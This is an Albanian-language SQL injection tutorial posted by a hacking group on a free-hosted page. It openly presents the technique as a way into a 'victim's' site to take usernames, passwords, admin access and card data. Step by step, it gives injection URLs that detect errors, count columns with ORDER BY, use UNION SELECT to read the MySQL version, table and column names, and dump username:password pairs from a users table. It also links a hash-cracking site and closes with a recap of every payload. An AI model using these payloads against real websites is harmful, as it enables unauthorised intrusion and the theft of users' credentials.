<-----TFH - CReW ----->[Offical Page] (Tuttorial-For-Hack)
  SQL Tuttorial
 

1.SQL-injetion-Tutorial për Versionin 5.x.x
----------------------------------------------------

1.1 Cka është SQL-injetion?
1.2 Provo faqen për vulnerability!
1.3 Si të zbulojmë sa numra të kolumnave egzistojnë?
1.4 Provo për UNION SELECT funksionin!
1.5 Si të zbulojmë verzionin e MYSQL-së?
1.6 Si të zbulojmë Table_name?
1.7 Si të zbulojmë Column_name?
1.8 Përfundim?



============================
1.1 Cka është SQL-injetion?
============================

SQL-injetion është një ndër metodat më të përdorura ditët e sodit për të marrë akses në ndonjë webfaqe.
Kjo metodë i jep leje sulmuesit që të sulmon përmes URL-së.
Me këtë metodë sulmuesi ka mundësi të marrë informata të ndryshme nga MYSQL-së,(username,passwords), logins të ndryshëm,
akses nëpër faqe të administrimit, CC etj...



====================================
1.2 Provo faqen për vulnerability!!
====================================

Të themi se kemi dicka të till:

----------------------------------
http://www.site.com/vesti.php?id=1
----------------------------------


Tani që të testojm se a është faqa vulnerability, apo thjesht ka buggs shkojmë dhe ja shtojmë ' pra presjen lart, e cila
do të duket kështu:

-----------------------------------
http://www.site.com/vesti.php?id=1'
-----------------------------------

Pra pas këtij veprimi, nëse na jepë ndonjë error si prsh:

++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++
"You have an error in your 
SQL syntax;" ose "Warning: mysql_result() [function.mysql-result]:"
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++

Me këtë nënkuptohet se faqja është vulnerability, pra ka lëshime!



================================================== ===
1.3 Si të zbulojmë sa numra të kolumnave egzistojnë?
================================================== ===

Për të gjetur sa Kolumna kemi, përdorim: ORDER BY
Pra (order by) do të na ndihmon të gjejmë sa kolumna kemi në faqen e viktimës, shkojmë në shëmbull:

----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 1-- <--> Hapet faqja normal pra nuk na jep Error
----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 2-- <--> Hapet faqja normal pra nuk na jep Error
----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 3-- <--> Hapet faqja normal pra nuk na jep Error
----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 4-- <--> Hapet faqja normal pra nuk na jep Error
----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 5-- <--> Error page - Pra këtu kemi Error
----------------------------------------------------------------------------------------------------

Me këtë nënkuptojmë se tek kjo faqe kemi 4 Kolumna, pra e heqim (5) numrin e fundit i cili jep error!
e lejmë kështu: 
http://www.site.com/vesti.php?id=1 order by 4--



=======================================
1.4 Provo për UNION SELECT funksionin!
=======================================

Pra tani do të provojmë që të nxjerim numrat e kolumnave dhe të dhënat të tjera në dritare, përmes (Union select).

Nëse kemi 4 numra të kolumnave në shembull, do të dukej dicka e tillë:

---------------------------------------------------------
http://www.site.com/vesti.php?id=1 union select 1,2,3,4--
---------------------------------------------------------

Nëse në faqe na shfaqet ndonjëri prej numrave prej 1-4 atëherë është mirë funksionon gjithçka në rregull por në qoft se jo
atëhere provoni të ja shtoni nji - (minus) përpara tek (1)
shembull:

----------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,3,4--
----------------------------------------------------------

Tani duhet të shfaqet ndonjëri prej 4 numrave prej 1-4.
Nëse shfaqet ndonjëri prej këtyre numrave atëhere gjithcka është në rregull!



=========================================
1.5 Si të zbulojmë verzionin e MYSQL-së?
=========================================

Si të zbulojmë verzionin e mysql-së është lehtë, këte mundemi të bëjmë duke zevendesuar numrin e kolumnës me këtë (@@version).
Më pas duhet të na shfaqet se cfarë verzioni është prezent në faqen e viktimës.
Të themi se numri i cili shfaqet është (3) për të treguar më qart do ju tregoj me shëmbullin më poshtë:

------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,@@version,4--
------------------------------------------------------------------

Dhe tani do të na shfaqet versioni.



===============================
1.6 Si të zbulojmë Table_name?
===============================



----------------------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()--
----------------------------------------------------------------------------------------------------------------------------------------------

Dhe Tani do të na shfaqet emri tabelës prsh: (users).



================================
1.7 Si të zbulojmë Column_name?
================================

E njëjta gjë vlen edhe per gjetjen e kolumnave(column_name) sikur tek table_name!

Në vënd ku shkruan
(table_name) & tables duhet vendosur (column_name) & columns.

Shkojmë të shfaqim edhe këtë shëmbull:

------------------------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
------------------------------------------------------------------------------------------------------------------------------------------------

Të themi që column_name janë (username, password).

Ja kështu duhet vepruar që të na shfaqet (Username, Passwordi ose Hashi):

---------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,group_concat(username,0x3a,password,),4 from users--
---------------------------------------------------------------------------------------------------------

Dhe tani na shfaqen (Username, Passwordi ose Hashi)

nëse del (hashi) këtu mundë ta Crackoni:
-----------------------------------
http://gdataonline.com/seekhash.php
-----------------------------------



===============
1.8 Përfundim?
===============

Si përfundim do ti postoj të gjitha linqet në një vënd që ta keni më të lehtë për tu bazuar!

------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1'
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 1-- <--> Hapet faqja normal pra nuk na jep Error
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 2-- <--> Hapet faqja normal pra nuk na jep Error
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 3-- <--> Hapet faqja normal pra nuk na jep Error
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 4-- <--> Hapet faqja normal pra nuk na jep Error
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 union select 1,2,3,4--
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,3,4--
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,@@version,4--
----------------------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()--
------------------------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
------------------------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,group_concat(username,0x3a,password,),4 from users--

 
 
  Today, there have been 40 visitors (175 hits) on this page!  
 
This website was created for free with Own-Free-Website.com. Would you also like to have your own website?
Sign up for free